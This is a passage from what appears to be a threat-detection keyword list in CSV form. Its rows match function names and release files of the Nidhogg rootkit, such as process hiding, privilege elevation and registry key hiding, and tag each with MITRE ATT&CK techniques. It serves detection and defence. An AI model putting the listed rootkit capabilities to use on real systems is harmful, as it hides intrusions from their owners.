T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessElevate*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessElevate.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessSetProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessSetProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessUnhide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnhide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessUnprotect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggQueryProcesses*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryProcesses.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggQueryThreads*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryThreads.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggThreadHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggThreadProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryClearAll*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryClearAll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryHideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryHideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryUnhideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryUnhideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryUnprotectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnprotectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.1.zip*",".{0,1000}Nidhogg\-0\.1\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.2.zip*",".{0,1000}Nidhogg\-0\.2\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an 